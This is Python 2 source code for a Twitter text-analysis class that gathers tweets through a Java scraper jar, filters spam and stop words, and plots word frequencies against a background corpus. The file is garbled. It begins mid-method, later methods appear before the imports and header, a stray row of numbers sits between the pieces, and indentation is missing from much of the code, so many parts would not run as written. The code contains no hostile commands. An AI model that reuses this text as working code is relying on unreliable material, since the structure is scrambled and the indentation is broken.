                text_index = self.tweets_df[self.tweets_df.text.str.contains(term) == True].index
                self.tweets_df.drop(text_index, inplace=True)
        else:
            raise Exception("Input must be string or list of string.")

        # Reindex dataframe
        self.tweets_df.index = range(len(self.tweets_df))
def drop_by_username_with_n_tweets(self, max_num_occurrences=1):
""" Drops all tweets by usernames that appear more than
max_num_occurrences times in tweets_df.
This function can be time consuming.
Dropping all users with more than 1 tweet should be a safe way to
filter out a lot of the spam.
"""
start_time = time.time()
print "Dropping tweets by repeated users..."
# get list of usernames that occur too much
repeat_user_counts = self.tweets_df["username"].value_counts()
for i in range(len(repeat_user_counts)):
if repeat_user_counts[i] <= max_num_occurrences:
break_index = i
break
repeated_usernames = list(repeat_user_counts[0:break_index].index)
print "Found", len(repeated_usernames), "users with more than", \
max_num_occurrences, "tweets in tweets_df"
# drop these usernames from tweets_df
percentile_num = len(repeated_usernames)//20
for i, twitter_username in enumerate(repeated_usernames):
if len(repeated_usernames) <= 100:
print "Dropping tweets from user", i
elif i%percentile_num == 0:
print "Finished", 5*i/percentile_num, "percent of user drops"
drop_index = self.tweets_df[self.tweets_df.username == twitter_username].index
self.tweets_df.drop(drop_index, inplace=True)
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
print "Took", round((time.time() - start_time)/60.,3), \
"minutes to complete"
    def add_stop_words(self, stopwords_item):
        """ Add word or list of words to stop words used in create_word_bag.

        stopwords_item (string or list of strings): stop word(s) to add;
            byte strings are decoded to unicode before being stored

        The word might be a url or spam tag. A common case is parts of urls
        that are parsed into words (e.g. from youtube) that appear repeatedly.

        The new stopwords will appear at end of self.stop_words list, so user
        can easily check to see which stopwords have been recently added by the
        user.

        Raises Exception when stopwords_item is neither a string nor a list.
        """
        if type(stopwords_item) in (str, unicode):
            if type(stopwords_item) == str:
                # convert string to unicode if not unicode already
                stopwords_item = stopwords_item.decode('utf-8')
            self.stop_words = self.stop_words + [stopwords_item]
        elif type(stopwords_item) == list:
            # validate every entry before converting any of them
            for term in stopwords_item:
                assert type(term) in (str, unicode)
                assert len(term) > 0
            unicode_terms_list = [term if type(term) == unicode
                                  else term.decode('utf-8')
                                  for term in stopwords_item]
            self.stop_words = self.stop_words + unicode_terms_list
        else:
            raise Exception("Input must be string or list of strings.")
#############################################################
# Methods for investigating word frequencies
#############################################################
""" The create_word_freq_df method is used to create a dataframe
that gives the word occurrences and word frequencies of the top n words in
the corpus. This is created using the existing nltk object, and it is
changed depending on how many words we wish to inspect graphically.
This word frequency dataframe is fundamental object of interest, and is
stored in the word_freq_df attribute, which is a pandas dataframe.
For now the background corpus is derived from ~2.6 GB of twitter data,
composing about 72 million words. The word frequency rates from this
sample are stored in a frequency sample file that is then converted into
a python dictionary for fast lookup.
"""
    def create_word_bag(self):
        """ Takes tweet dataframe and outputs word_bag, which is a list of all
        words in all tweets, with punctuation and stop words removed. word_bag
        is contained inside the attribute self.word_bag.

        This method will often be called repeatedly during data inspection, as
        it needs to be redone every time some tweets are dropped from
        tweets_df.
        """
        start_time = time.time()
        # Convert dataframe tweets column to python list of tweets, then join
        # this list together into one long list of words
        tweets_list = self.tweets_df["text"].tolist()
        words_string = " ".join(tweets_list)
        print "Time to make words_string: ", round((time.time() - start_time)/60., 3), "minutes"
        start_time = time.time()
        # Use nltk word tokenization to break list into words and remove
        # stop words
        tokens = nltk.word_tokenize(words_string)
        print "Time to tokenize: ", round((time.time() - start_time)/60., 3), "minutes"
        start_time = time.time()
        # filter the stop words out of the token stream
        self.word_bag = [word for word in tokens if word not in self.stop_words]
        print "Time to compute word bag: ", round((time.time() - start_time)/60., 3), "minutes"
def make_nltk_object_from_word_bag(self, word_bag=None):
""" Creates nltk word statistical object from the current word_bag
attribute. word_bag is left as an input in case the user wants to
create an nltk object with an external word bag.
The most common method we'll use from this object is the
frequency method, i.e. freq_dist.freq(term), where term is word in
word bag.
Use print(freq_dist) to get the number of unique words in corpus, as
well as total number of words in corpus.
Can use freq_dist.most_common(50) to get list of 50 most common words
and the number of times each of them appears in text.
"""
if word_bag is None:
word_bag = self.word_bag
self.freq_dist = nltk.FreqDist(self.word_bag)
def create_word_freq_df(self, top_n_words):
""" Creates pandas dataframe called word_freq_df of the most common n
words in corpus, with columns:
occurrences: how often each of them occurred
frequency: word frequency in the corpus
frequency ratio: word relative frequency to background
log frequency ratio: log of the relative frequency to background rates
background_occur: the number of times word appears in background corpus
(The log is useful because, for example, a rate two times as high as
background has log ratio of +x, and a rate two times lower than
background rates has a log ratio of -x.)
n is the number of words we want to see. These words are draw in order
of how frequently they are found in the corpus, so a large number of
words should be chosen to make sure we find the interesting ones that
appear much more often than in background corpus. (If a word appears
often in our search corpus it may be because it also appear often in
the background corpus, which is not of interest.)
The actual words that were searched to collect the corpus are omitted
from this dataframe (as long as self.search_terms has been set).
n (int): number of most frequent words we want to appear in dataframe
"""
print "Creating word_freq_df..."
print "Takes about 1 minute per 1000 words"
start_time = time.time()
# make dataframe we'll use in plotting
num_words = top_n_words
word_frequencies_list = []
for word, occurrences in self.freq_dist.most_common(num_words):
# determine whether word appears in background dict; if it does
# not, the frequency ratio is set to zero
if word in self.search_terms:
continue
if word in self.background_dict.keys():
freq_ratio = self.freq_dist.freq(word)/self.background_dict[word][0]
background_freq = self.background_dict[word][0]
log_freq_ratio = log(freq_ratio)
background_occur = self.background_dict[word][1]
else:
freq_ratio = 0
background_freq = 0
log_freq_ratio = 0
background_occur = 0
# faster to make list and then make dataframe in one line
# than to repeatedly append to an existing dataframe
word_frequencies_list.append((word, occurrences,
self.freq_dist.freq(word),
freq_ratio, log_freq_ratio,
background_occur))
word_freq_df = pd.DataFrame(word_frequencies_list,
columns=['word', 'occurrences', 'frequency',
'relative frequency', 'log relative frequency',
'background occurrences'])
print "Time to create word_freq_df: ", \
round((time.time() - start_time)/60., 4), "minutes"
self.word_freq_df = word_freq_df
def custom_word_frequency_dataframe(self, words):
""" Same function as create_word_freq_df except instead of
using top n words from corpus, a custom list of words is used. This
function returns the dataframe it creates instead of setting it to
word_freq_df. (The user can append what this function creates to
word_freq_df by hand with pd.concat(df1, df1).)
An example use case is to use a list of known words of interest to
construct a type of "word vector" for a particular word (presumably
the word searched on using Java tweet collector). For example, for
politics one might choose words like "conservative", "liberal",
"regulation" and "liberty" as a set of word axes, and then see how
twitter-searched words like "taxes", "Obamacare", etc. appear as word
vectors along these axes.
words: list of words to put in dataframe - each word is a string
"""
word_frequencies_list = []
words = [x.decode("utf-8") if type(x) == str else x for x in words]
for word in words:
# determine whether word appears in both background dict and corpus
# if it does not, the frequency ratio is set to zero
if word in self.search_terms:
continue
occurrences = self.freq_dist[word]
if word in self.background_dict.keys() and occurrences != 0:
freq_ratio = self.freq_dist.freq(word)/self.background_dict[word][0]
background_freq = self.background_dict[word][0]
log_freq_ratio = log(freq_ratio)
background_occur = self.background_dict[word][1]
else:
freq_ratio = 0
background_freq = 0
log_freq_ratio = 0
background_occur = 0
# faster to make list and then make dataframe in one line
# than to repeatedly append to an existing dataframe
word_frequencies_list.append((word, occurrences,
self.freq_dist.freq(word),
freq_ratio, log_freq_ratio,
background_occur))
word_freq_df = pd.DataFrame(word_frequencies_list,
columns=['word', 'occurrences', 'frequency',
'relative frequency', 'log relative frequency',
'background_occur'])
return word_freq_df
def plot_word_frequencies(self, plot_string, dataframe=None):
""" Plots of given value about word, where plot_string is a string
that gives quantity to be plotted. This is just an example function,
user will want to use word_freq_df and matplotlib directly for more
detailed and better-looking plots.
Note that the plot can't display unicode characters correctly, so if a
word looks like a little box you'll have to pull up word_freq_df to see
what the character actually is.
plot_string (string): column of word_freq_df dataframe, e.g.
"occurrences", "frequency", "relative frequency",
"log relative frequency", etc.
dataframe (pandas dataframe): dataframe of the same form as
word_freq_df; if left empty then
self.word_freq_df is plotted
"""
if dataframe is None:
dataframe = self.word_freq_df
num_words = len(dataframe)
try:
dataframe.set_index("word")[plot_string].plot.barh(figsize=(20,
num_words/2.), fontsize=30, color="c");
plt.title(plot_string, fontsize=30);
ax = plt.axes();
ax.xaxis.grid(linewidth=4);
except:
raise Exception("Input string must be column name of word_freq_df")
""" This was more customized code that can be used later if needed - for
now the pandas default plotting code is good enough for most purposes
sns.set(style="darkgrid")
num_words = len(self.word_freq_df)
# Initialize the matplotlib figure - the second number in figure gives
# height, this will need to depend on how many words are included in
# figure
f, ax = plt.subplots(figsize=(16, num_words/2.))
plt.yticks(fontsize=20)
plt.xticks(fontsize=20)
# Plot the frequencies
sns.set_color_codes("pastel")
sns.barplot(x=plot_string, y="word", data=self.word_freq_df,
label="frequency", color="b")
# Add informative axis label
max_value = self.word_freq_df.iloc[0].frequency # find maximum frequency
# adjust axis to be slightly larger than this max frequency
ax.set(xlim=(0, max_value*1.1), ylabel="", xlabel="Word frequency")
ax.set_xlabel(plot_string, fontsize=30)
ax.xaxis.set_label_position('top')
ax.xaxis.tick_top()
ax.tick_params(axis='x', labelsize=20) # size of numerical labels
"""
#############################################################
# Methods to inspect tweets in tweets_df dataframe
#############################################################
""" These methods are used to inspect tweets of interest in the main
dataframe tweets_df. A typical workflow is to visualize tweet word
frequencies using visualization functions, then inspect a sample of tweets
that contain a word of interest. If these tweets appear to be unwanted they
can then be dropped using the dropping functions above.
Note about displaying tweets in pandas in readable form: need to set
pd.set_option('display.max_colwidth', -1) and/or
pd.set_option('display.width',800)
    This makes it so that the entire tweet is displayed without being cut
    off when only tweets are presented in the dataframe.
Can enter pd.describe_option('display') to get comprehensive list of
settings for ipython displays.
"""
def tweets_containing(self, term):
""" Returns all tweets that contain term from tweets_df.
Term is a string.
The returned object is a dataframe that contains the rows of tweets_df
dataframe that have tweets containing term.
term (string): term of interest
"""
assert type(term) in (str, unicode)
assert term
tweets_containing = self.tweets_df[self.tweets_df.text.str.contains(term) == True]
print len(tweets_containing), "tweets contain this term"
return tweets_containing[["username", "text"]]
def tweets_by(self, username):
""" Returns all tweets by username from tweets_df.
Similar to above function except searches by username rather than
tweet text.
username (string): username of interest
"""
assert type(username) in (str, unicode)
assert username
tweets_by = self.tweets_df[self.tweets_df.username == username]
return tweets_by[["username", "text"]]
| 46.611111 | 147 | 0.605502 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import time
import datetime
import string
from os import listdir
from os.path import join as pathjoin
from math import log, ceil
import subprocess
import pandas as pd
import nltk
from nltk.corpus import stopwords
import matplotlib.pyplot as plt
import tailer
from ttp import ttp
# use this if you want to include modules from a subfolder
#cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"GetOldTweets-python")))
#if cmd_subfolder not in sys.path:
# sys.path.insert(0, cmd_subfolder)
pd.set_option('display.max_colwidth', -1)
class Twords(object):
""" Object that takes in tweets from Java twitter search engine and allows
manipulation, analysis and visualization.
Attributes:
jar_folder_path (string): path to where java jar twitter search files
are stored
data_path (string): path to data set from java twitter search.
It can be either path to single file, or path to
directory containing several csv files. Files are
assumed to be in format give by output of
create_java_tweets function below
background_path (string): path to background data. Form of background
data file is csv with columns 'word', 'occurrences',
and 'frequency' for words as they occur in some
background corpus.
background_dict (dictionary): dictionary of background rates of English
words, used in comparing word frequencies.
Can be set using create_Background_dict
function.
search_terms (list of strings): list of search terms used when collecting
tweets using create_java_tweets
tweets_df (pandas dataframe): pandas dataframe that holds all tweet data.
This is central object in an instance of
Twords.
word_bag (list of strings): list of all word tokens in tweets contained
in tweets_df, not including stop words (stop
words are contained in self.stop_words)
stop_words (list of string): list of words that shouldn't be included when
computing word bag for tweets. This includes
standard English words like "the" as well as
Twitter-data-specific things like "https://"
freq_dist (nltk object): nltk.FreqDist(self.word_bag); nltk object that
contains statistical properties of words in
word_bag
word_freq_df (pandas dataframe): pandas dataframe containing top n words
in tweets data along with data like
word frequency, word frequency divided
by background frequency for that word, etc.
More info under function
create_word_freq_df(self, n),
which creates word_freq_df.
"""
def __init__(self):
self.jar_folder_path = ''
self.data_path = ''
self.background_path = ''
self.background_dict = {}
self.search_terms = []
self.tweets_df = pd.DataFrame()
self.word_bag = []
self.stop_words = []
self.freq_dist = nltk.FreqDist(self.word_bag)
self.word_freq_df = pd.DataFrame()
def __repr__(self):
return "Twitter word analysis object"
#############################################################
# Methods to set attributes
#############################################################
def set_Search_terms(self, search_terms):
""" search_terms is a list of strings that were used in twitter search
to obtain data in tweets_df.
The strings will be converted to unicode inside Twords, even though the
user may enter them as ordinary strings.
"""
assert type(search_terms) == list
for term in search_terms:
assert type(term) in (str, unicode)
unicode_list = [x.decode("utf-8") if type(x) == str
else x for x in search_terms]
self.search_terms = unicode_list
def create_Background_dict(self):
""" Create the dictionary of background word rates from file in the
background data path.
key: word (string)
value: tuple of form (frequency, occurrences), where
frequency is frequency of word in background data set, and
occurrences is total number of occurrences in background data
set
"""
sample_rates = pd.read_csv(self.background_path, sep=",", encoding='utf-8')
background_dict = dict(zip(sample_rates["word"], zip(sample_rates["frequency"],sample_rates["occurrences"])))
self.background_dict = background_dict
def create_Stop_words(self):
""" Create list of stop words used in create_word_bag function.
Stop words created here are defaults - the user may add new stop words
later with the add_stop_words function.
This default list combines English stopwords from nltk corpus
(stopwords), punctuation marks from python standard string library,
and a custom-list the author found useful when parsing tweets.
"""
punctuation = [item.decode('utf-8') for item in list(string.punctuation)]
stop = stopwords.words('english') + punctuation + \
[u'rt', u'RT', u'via', u'http', u"n't", u"'s", u"...", u"''",
u"'m", u"--", u"'ll", u"'ve", u"'re", u"//www"]
self.stop_words = stop
##############################################################
# Methods to gather tweets via keyword search with
# Java GetOldTweets
##############################################################
def create_java_tweets(self, total_num_tweets, tweets_per_run, querysearch,
final_until=None, output_folder="output",
decay_factor=4, all_tweets=True):
""" Function that calls java program iteratively further and further
back in time until the desired number of tweets are collected. The
"until" parameter gives the most recent date tweets can be found from,
and the search function works backward in time progressively from that
date until the max number of tweets are found. Thus each new call to
_get_one_java_run_and_return_last_line_date will start the search one
day further in the past.
total_num_tweets: (int) total number of tweets to collect
tweets_per_run: (int) number of tweets in call to java program - should
not be over 50,000, better to keep around 10,000
querysearch: (string) string defining query for twitter search - see
Henrique code
(e.g, "europe refugees" for search for tweets containing
BOTH "europe" and "refugees" - currently putting in OR by
hand does not yield desired result, so two separate
searches will have to be done for "OR" between words)
final_until: (string) date string of the form '2015-07-31' that gives
ending date that tweets are searched before (this is
distinguished from the changing "until" that is used in
the calls to _get_one_java_run_and_return_last_line_date).
If left as "None" it defaults to the current date.
output_folder: (string) name of folder to put output in
decay_factor: (int) how quickly to wind down tweet search if errors
occur and no tweets are found in a run - a failed run
will count as tweets_per_run/decay_factor tweets found,
so the higher the factor the longer the program will try
to search for tweets even if it gathers none in a run
all_tweets: (bool) flag for which jar to use - True means use
all_tweets jar, False means use top_tweets jar
"""
if final_until is None:
final_until = str(datetime.datetime.now())[:10]
print "Collecting", str(total_num_tweets), "tweets with", \
str(tweets_per_run), "tweets per run."
print "Expecting", \
str(int(ceil(total_num_tweets/float(tweets_per_run)))), \
"total runs"
start_time = time.time()
tweets_searched = 0
run_counter = 1
# create folder that tweets will be saved into
subprocess.call(['mkdir', output_folder])
until = final_until
while tweets_searched < total_num_tweets:
print "Collecting run", run_counter
run_counter += 1
# call java program and get date of last tweet found
last_date = self._get_one_java_run_and_return_last_line_date(
querysearch, until, tweets_per_run, all_tweets)
# rename each output file and put into new folder - output file
# is named by until date
new_file_location = output_folder + '/' + querysearch + '_' + \
until + '.csv'
subprocess.call(['mv', 'output_got.csv', new_file_location])
# if last_date is usual date proceed as normal - if not raise error
# and stop search
if self._validate_date(last_date):
until = last_date
tweets_searched += tweets_per_run
else:
# set search date one day further in past
new_until_date_object = datetime.datetime.strptime(until, '%Y-%m-%d') \
- datetime.timedelta(days=1)
until = str(new_until_date_object)[:10]
# consider this a few tweets searched so program doesn't run
# forever if it gathers no tweets
tweets_searched += (tweets_per_run)/float(decay_factor)
self.data_path = output_folder
self.search_terms = querysearch.split()
print "Total time to collect", str(total_num_tweets), "tweets:", \
round((time.time() - start_time)/60.,1), "minutes"
def get_tweets_from_single_java_csv(self):
""" Takes path to twitter data obtained with java tweet search library
and builds a dataframe of the tweets and their accompanying
information. Dataframe has columns for username, date, retweets,
favorites, text, mentions, and hashtag. The dataframe is stored under
the attribute tweets_pd.
"""
# Read in csv file with many columns to account for people who put many
# semicolons in tweets, then keep only the rows that don't have
# semicolons in a tweet by dropping rows with too many columns.
# (Semicolons are the delimeter in the java twitter search library.)
tweets = pd.read_csv(self.data_path, sep=";",
names=list('abcdefghijklmno'), encoding='utf-8')
tweets = tweets[tweets.k.isnull()]
# Rename the columns with correct labels and drop row that is just
# column names (this will index dataframe starting at 1).
tweets.columns = tweets.iloc[0]
tweets.drop(0, inplace=True)
# Drop the extra columns on the end
tweets = tweets[["username", "date", "retweets", "favorites", "text",
"mentions", "hashtags", "id", "permalink"]]
# Reindex dataframe
tweets.index = range(len(tweets))
self.tweets_df = tweets
def get_java_tweets_from_csv_list(self, list_of_csv_files=None):
""" Create tweets_df from list of tweet csv files
list_of_csv_files: python list of paths (the paths are strings) to csv
files containing tweets - if list_of_csv_files is
None then the files contained inside self.data_path
are used
"""
if list_of_csv_files is None:
list_of_csv_files = self._get_list_of_csv_files(self.data_path)
path_dict = {}
# create dictionary with paths for keys and corresponding tweets
# dataframe for values
for path in list_of_csv_files:
tweets = pd.read_csv(path, sep=";", names=list('abcdefghijklmno'),
encoding='utf-8')
tweets = tweets[tweets.k.isnull()]
tweets.columns = tweets.iloc[0]
tweets.drop(0, inplace=True)
tweets = tweets[["username", "date", "retweets", "favorites",
"text", "mentions", "hashtags", "id", "permalink"]]
tweets.index = range(len(tweets))
path_dict[path] = tweets
# join all created dataframes together into final tweets_df dataframe
self.tweets_df = pd.concat(path_dict.values(), ignore_index=True)
def _get_one_java_run_and_return_last_line_date(self, querysearch, until,
maxtweets, all_tweets=True,
since=None,
return_line=True):
""" Create one java csv using java jar (either Top Tweets or All tweets
as specified in all_tweets tag) and return date string from last tweet
collected.
querysearch: (string) query string, usually one word - multiple words
imply an "AND" between them
maxtweets: (int) number of tweets to return
since: (string of form '2015-09-30') string of date to search since;
this is optional and won't be used when using the
create_java_tweets function
until: (string of form '2015-09-30') string of date to search until,
since search is conducted backwards in time
return_line (bool): whether to return date from last line or not; if
true the date from the last line in the csv is
returned
"""
start_time = time.time()
# choose which jar file to use
jar_string = self.jar_folder_path + '/got_top_tweets.jar'
if all_tweets:
jar_string = self.jar_folder_path + '/got_all_tweets.jar'
# create search string
quotation_mark = '"'
query_string = 'querysearch=' + quotation_mark + querysearch + quotation_mark
until_string = 'until=' + until
maxtweets_string = 'maxtweets=' + str(maxtweets)
# create output_got.csv file of tweets with these search parameters
if since is None:
subprocess.call(['java', '-jar', jar_string, query_string,
until_string, maxtweets_string])
else:
since_string = 'since=' + since
subprocess.call(['java', '-jar', jar_string, query_string,
since_string, until_string, maxtweets_string])
# find date on last tweet in this file (in last line of file)
last_line = tailer.tail(open('output_got.csv'), 1)[0]
date_position = last_line.find(';')
date_string = last_line[date_position+1:date_position+11]
date_string = self._convert_date_to_standard(date_string)
print "Time to collect", str(maxtweets), "tweets:", \
round((time.time() - start_time)/60., 1), "minutes"
if return_line:
return date_string
def _get_list_of_csv_files(self, directory_path):
""" Return list of csv files inside a directory
directory_path: (string) path to directory holding csv files of
interest
"""
return [pathjoin(directory_path, f) for f in listdir(directory_path)
if f[-4:] == '.csv']
def _validate_date(self, date_text):
""" Return true if date_text is string of form '2015-06-29',
false otherwise.
date_text (string): date
"""
try:
datetime.datetime.strptime(date_text, '%Y-%m-%d')
return True
except ValueError:
return False
##############################################################
# Methods to gather user timeline tweets with
# Java GetOldTweets
##############################################################
def get_user_tweets(self, user, max_tweets, start_date=None,
end_date=None, all_tweets=True, return_line=True):
""" Returns max_tweets from Twitter timeline of user. Appears to work
better when start and end dates are included. The returned tweets
include tweets on the start_date, and up to (but not including) tweets
on the end_date.
If only an end_date is provided, then the tweets are searched backward
in time starting at the end date and continuing until max_tweets
have been found.
Creates folder named by twitter username searched that contains tweets
in series of csv files.
user (string): Twitter handle of user, e.g. barackobama
max_tweets (int): number of tweets to return for that user; set
max_tweets to -1 to return all tweets in timeline
start_date (string): starting date for search of form "2015-09-30"
end_date (string): ending date for search of form "2015-09-30"
all_tweets (bool): whether to use "top_tweets" or "all_tweets" java
jar file
return_line (bool): whether to return date on last tweet returned;
needed for function that makes repeated calls to
this function, e.g. get_all_user_tweets
"""
start_time = time.time()
# choose which jar file to use
jar_string = self.jar_folder_path + '/got_top_tweets.jar'
if all_tweets:
jar_string = self.jar_folder_path + '/got_all_tweets.jar'
# create search string
user_string = 'username=' + user
maxtweets_string = 'maxtweets=' + str(max_tweets)
if start_date is not None:
since_string = 'since=' + start_date
if end_date is not None:
until_string = 'until=' + end_date
# create output_got.csv file of tweets with these search parameters
if start_date is None and end_date is None:
subprocess.call(['java', '-jar', jar_string, user_string,
maxtweets_string])
elif start_date is None and end_date is not None:
subprocess.call(['java', '-jar', jar_string, user_string,
until_string, maxtweets_string])
else:
subprocess.call(['java', '-jar', jar_string, user_string,
since_string, until_string, maxtweets_string])
# find date on last tweet in this file (in last line of file)
last_line = tailer.tail(open('output_got.csv'), 1)[0]
date_position = last_line.find(';')
date_string = last_line[date_position+1:date_position+11]
date_string = self._convert_date_to_standard(date_string)
print "Time to collect", str(max_tweets), "tweets:", \
round((time.time() - start_time)/60.,1), "minutes"
if return_line:
return date_string
def get_all_user_tweets(self, user, tweets_per_run):
""" Return all tweets in a user's timeline. This is necessary
to do in batches since one call to get_user_tweets does not return
all of the tweets (too many in one run breaks the web-scrolling
functionality of GetOldTweets). The tweets are saved as series of
csv files into output folder named by username of twitter user.
The final date is one day after the current date, since tweets are
returned up to (but not including) the end_date in get_user_tweets
function.
This function will return duplicates of some tweets to be sure all
tweets are obtained - these can be eliminated by simply dropping
duplicates in the text column of resulting pandas dataframe.
Function typically fails to return every single tweet, but captures
most (~87 percent for barackobama) - best performance when
tweets_per_run is around 500.
Creates: folder (named by username searched) of csv files
user (string): twitter handle of user, e.g. "barackobama"
tweets_per_run (int): how many tweets to pull in each run
"""
# increment the date one day forward from returned day when calling
# get_user_tweets to be sure all tweets in overlapping
# range are returned - experimentation showed that tweets on the edge
# between date runs can be lost otherwise
start_time = time.time()
print "Collecting tweets with", str(tweets_per_run), "tweets per run."
# create folder that tweets will be saved into
subprocess.call(['mkdir', user])
# set one day in future so that all tweets up to today are returned;
# necessary because tweets are returned on dates up to but not
# including end date
final_until = str(datetime.datetime.now() +
datetime.timedelta(days=1))[:10]
until = final_until
continue_search = True
run_counter = 1
while continue_search:
print "Collecting run", run_counter
run_counter += 1
# call user function and get date of last tweet found
last_date = self.get_user_tweets(user, tweets_per_run,
end_date=until)
# rename each output file and put into new folder - output file
# is named by until date
new_file_location = user + '/' + until + '.csv'
subprocess.call(['mv', 'output_got.csv', new_file_location])
# if last_date is a date proceed as normal - if the last_date
# hasn't changed, raise comment below
if self._validate_date(last_date):
until_minus_day_object = datetime.datetime.strptime(until, '%Y-%m-%d') \
- datetime.timedelta(days=1)
until_minus_day = str(until_minus_day_object)[:10]
if last_date == until_minus_day:
# from experimentation sometimes a query of many tweets
# will get "stuck" on a day long before 500 tweets have
# been reached - solution is just increment day as usual
print "Tweets timeline incremented by only one day - may " \
"need larger tweets_per_run, or could just be " \
"regular stutter in querying timeline."
until = last_date
else:
# this increment is to avoid losing tweets at the edge
# between date queries - experimentation showed they can
# be lost without this redundancy - this means when tweets
# are read there may be duplicates that require deletion
new_until_date_object = datetime.datetime.strptime(last_date, '%Y-%m-%d') \
+ datetime.timedelta(days=1)
until = str(new_until_date_object)[:10]
else:
continue_search = False
# set data path to new output folder to read in new tweets easily
self.data_path = user
print "Total time to collect tweets:", \
round((time.time() - start_time)/60.,1), "minutes"
#############################################################
# Methods to clean and prune tweets (probably used
# before visual inspection)
#############################################################
def keep_column_of_original_tweets(self):
""" Devote a column of self.tweets_df to the original, unaltered tweets.
Can be useful for comparison after cleaning.
This should be done before any cleaning functions are applied to the
"text" column of self.tweets_df.
"""
self.tweets_df["original_tweets"] = self.tweets_df["text"]
def lower_tweets(self):
""" Lowers case of text in all the tweets, usernames, mentions and
hashtags in the tweets_df dataframe, if the dataframe has those
columns.
"""
column_names = list(self.tweets_df.columns.values)
if "username" in column_names:
self.tweets_df["username"] = self.tweets_df.username.str.lower()
if "text" in column_names:
self.tweets_df["text"] = self.tweets_df.text.str.lower()
if "mentions" in column_names:
self.tweets_df["mentions"] = self.tweets_df.mentions.str.lower()
if "hashtags" in column_names:
self.tweets_df["hashtags"] = self.tweets_df.hashtags.str.lower()
def keep_only_unicode_tweet_text(self):
""" Keeps only tweets where tweet text is unicode. This drops the
occasional tweet that has a NaN value in dataset, which becomes a float
when read into tweets_df.
"""
self.tweets_df["text_type"] = self.tweets_df["text"].map(lambda text: type(text))
self.tweets_df = self.tweets_df[self.tweets_df.text_type == unicode]
del self.tweets_df["text_type"]
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
def _remove_urls_from_single_tweet(self, tweet):
""" Remove urls from text of a single tweet.
This uses python tweet parsing library that misses some tweets but
doesn't get hung up with evil regex taking too long.
"""
p = ttp.Parser()
result = p.parse(tweet)
for x in result.urls:
tweet = tweet.replace(x, "")
tweet = tweet.strip()
return tweet
def remove_urls_from_tweets(self):
""" Remove urls from all tweets in self.tweets_df
"""
start_time = time.time()
print "Removing urls from tweets..."
print "This may take a minute - cleaning rate is about 400,000" \
" tweets per minute"
self.tweets_df["text"] = self.tweets_df["text"].map(self._remove_urls_from_single_tweet)
minutes_to_complete = (time.time() - start_time)/60.
print "Time to complete:", round(minutes_to_complete,3), \
"minutes"
print "Tweets cleaned per minute:", round(len(self.tweets_df)/minutes_to_complete, 1)
def remove_punctuation_from_tweets(self):
""" Strip common punctuation from tweets in self.tweets_df
"""
self.tweets_df["text"] = self.tweets_df["text"].apply(lambda x:
''.join([i for i in x if i not in
string.punctuation]))
def drop_non_ascii_characters_from_tweets(self):
""" Remove all characters that are not standard ascii.
"""
self.tweets_df['text'] = self.tweets_df["text"].apply(lambda x:
''.join([i if 32 <= ord(i) < 126 else
"" for i in x]))
def _convert_date_to_standard(self, date_text):
""" Convert a date string of form u"yyyy/mm/dd" into form u"yyyy-mm-dd"
for use with the python date module.
"""
assert type(date_text) in (str, unicode)
date_text = date_text.replace('/', '-')
return date_text
def convert_tweet_dates_to_standard(self):
""" Convert tweet dates from form "yyyy/mm/dd" to "yyyy-mm-dd" in
tweets_df dataframe.
"""
self.tweets_df["date"] = self.tweets_df["date"].map(self._convert_date_to_standard)
def sort_tweets_by_date(self):
""" Sort tweets by their date - useful for any sort of time series
analysis, e.g. analyzing sentiment changes over time.
"""
self.tweets_df.sort_values("date", inplace=True)
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
def drop_duplicate_tweets(self):
""" Drop duplicate tweets in tweets_df (except for the first instance
of each tweet)
"""
self.tweets_df.drop_duplicates("text", inplace=True)
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
def drop_by_search_in_name(self):
""" Drop tweets that contain element from search_terms in either
username or mention (i.e., tweets where the search term in contained in
twitter handle of someone writing or mentioned in tweet). Default
values of terms list is search_terms attribute, but user can add
to self.search_terms attribute to drop by additional terms.
"""
if not self.search_terms:
print "search_terms is empty - add at least one term to " + \
"search_terms attribute"
return self
for term in self.search_terms:
assert type(term) in (str, unicode)
assert term # to make sure string isn't empty
# Drop the tweets that contain any of search terms in either a username
# or a mention
column_names = list(self.tweets_df.columns.values)
for term in self.search_terms:
if "mentions" in column_names:
mentions_index = self.tweets_df[self.tweets_df.mentions.str.contains(term) == True].index
self.tweets_df.drop(mentions_index, inplace=True)
if "username" in column_names:
username_index = self.tweets_df[self.tweets_df.username.str.contains(term) == True].index
self.tweets_df.drop(username_index, inplace=True)
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
def keep_tweets_with_terms(self, term_list):
""" Drops all the tweets in tweets_df that do NOT contain at least one
term from term_list. This is useful for handling data from Twitter API
search stream, where it is often easiest to collect a single big stream
using several search terms and then parse the stream later.
Sometimes even tweets collected with java collector don't contain
desired terms, so this can be useful there as well.
term_list (string or list of strings): collection of terms to drop on
"""
if type(term_list) == str:
assert len(term_list) > 0
keep_index = self.tweets_df[self.tweets_df.text.str.contains(term_list) == True].index
self.tweets_df = self.tweets_df.iloc[keep_index]
if type(term_list) == list:
keep_index = pd.core.index.Int64Index([], dtype='int64')
for term in term_list:
assert len(term) > 0
term_keep_index = self.tweets_df[self.tweets_df.text.str.contains(term) == True].index
keep_index = keep_index.append(term_keep_index)
keep_index = keep_index.drop_duplicates()
self.tweets_df = self.tweets_df.iloc[keep_index]
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
#############################################################
# Methods to prune tweets (probably used after visual
# inspection)
#############################################################
def drop_by_term_in_name(self, terms):
    """ Drop tweets that contain an element of terms in either the username
    or a mention.

    Same logic as drop_by_search_in_name, except the terms come from the
    caller instead of self.search_terms; typically used to remove spam
    accounts spotted during visual inspection.

    terms (list): python list of strings (str or unicode); must be non-empty
    """
    if not terms:
        print "terms is empty - enter at least one search terms string"
        return self
    # Validate before mutating anything
    for term in terms:
        assert type(term) in (str, unicode)
        assert term
    # Drop the tweets that contain any of terms in either a username
    # or a mention; the columns are optional, so check presence first.
    # don't need to set " == True", that is redundant
    column_names = list(self.tweets_df.columns.values)
    for term in terms:
        if "mentions" in column_names:
            mentions_index = self.tweets_df[self.tweets_df.mentions.str.contains(term) == True].index
            self.tweets_df.drop(mentions_index, inplace=True)
        if "username" in column_names:
